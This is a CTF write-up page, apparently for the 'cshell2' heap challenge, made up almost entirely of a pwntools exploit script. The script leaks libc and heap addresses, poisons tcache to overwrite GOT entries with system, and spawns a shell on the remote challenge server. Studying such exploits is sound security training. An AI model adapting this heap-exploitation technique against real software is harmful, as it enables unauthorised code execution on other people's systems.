Rating:

detail (korean) -> https://mi-sutga-ru.tistory.com/9
```
#!/usr/bin/python3
# MIsutgaRU

from pwn import *

#s = process("./cshell2")
s = remote("be.ax", 31667)

def menu(index):
s.recvuntil(b"user\n")
s.sendline(index)

def add(index, size, first, middle, last, age, bio):
menu(b"1")
s.recvuntil(b"index: ")
s.sendline(str(index).encode())
s.recvuntil(b"minimum): ")
s.sendline(str(size).encode())
s.recvuntil(b"firstname: ")
s.sendline(first)
s.recvuntil(b"middlename: ")
s.send(middle)
s.recvuntil(b"lastname: ")
s.send(last)
s.recvuntil(b"age: ")
s.sendline(str(age).encode())
s.recvuntil(b"bio: ")
s.sendline(bio)

def show(index):
menu(b"2")
s.recvuntil(b"index: ")
s.sendline(str(index).encode())
s.recvuntil(b"A"*976)

def delete(index):
menu(b"3")
s.recvuntil(b"index: ")
s.sendline(str(index).encode())

def edit(index, first, middle, last, age, bio):
menu(b"4")
s.recvuntil(b"index: ")
s.sendline(str(index).encode())
s.recvuntil(b"firstname: ")
s.sendline(first)
s.recvuntil(b"middlename: ")
s.sendline(middle)
s.recvuntil(b"lastname: ")
s.sendline(last)
s.recvuntil(b"age: ")
s.sendline(str(age).encode())
s.recvuntil(b"bio: (max ")
size = int(s.recvuntil(")")[:-1]) + 32
log.info(hex(size))
s.recvuntil(b"\n")
s.send(bio)

def re_age(index, age):
menu(b"5")
s.recvuntil(b"index: ")
s.sendline(str(index).encode())
s.recvuntil(b"age: ")
s.sendline(str(age).encode())

names = 0x4040c0 #bss address
got = 0x404010
free_got = 0x404018
puts_got = 0x404020
printf_got = 0x404030
malloc_got = 0x404040

#pause()
add(0, 1032, b"a", b"b", b"c", 10, b"A")
add(1, 2032, b"A", b"B", b"C", 20, b"B")
add(2, 1032, b"aa", b"bb", b"cc", 30, b"C")
delete(1)
edit(0, b"aa", b"bb", b"cc", 11, b"A"*976)
show(0)
leak = u64(s.recv(6).ljust(8, b"\x00"))
log.info(hex(leak))
libc = leak - 0x1c7cc0
log.info(hex(libc))

edit(0, b"aa", b"bb", b"cc", 11, b"A"*968+p64(0x801))
add(3, 1032, b"A", b"B", b"C", 20, b"B")
menu(b"2")
s.recvuntil(b"index: ")
s.sendline(b"3")
s.recvuntil(b"last: ")
heapbase = u64(s.recv(4).ljust(8, b"\x00")) - 0x643
log.info(hex(heapbase))
heap = int(heapbase/0x1000)
system = libc + 0x470d0
puts = libc + 0x71ab0
scanf = libc + 0x4cb40

#pause()
add(4, 1032, b"/bin/sh", b"/bin/sh", b"/bin/sh", 10, b"/bin/sh")
add(5, 1032, b"/bin/sh", b"/bin/sh", b"/bin/sh", 10, b"/bin/sh")
delete(3)
delete(5)
edit(4, b"/bin/sh", b"/bin/sh", b"/bin/sh", 20, b"A"*976+p64(got^heap+0x1))
add(6, 1032, b"/bin/sh", b"/bin/sh", b"/bin/sh", 10, b"/bin/sh")
add(7, 1032, b"\x00", p64(system), p64(puts), 10, p64(scanf))
delete(4)

s.interactive()

```

Original writeup (https://mi-sutga-ru.tistory.com/9).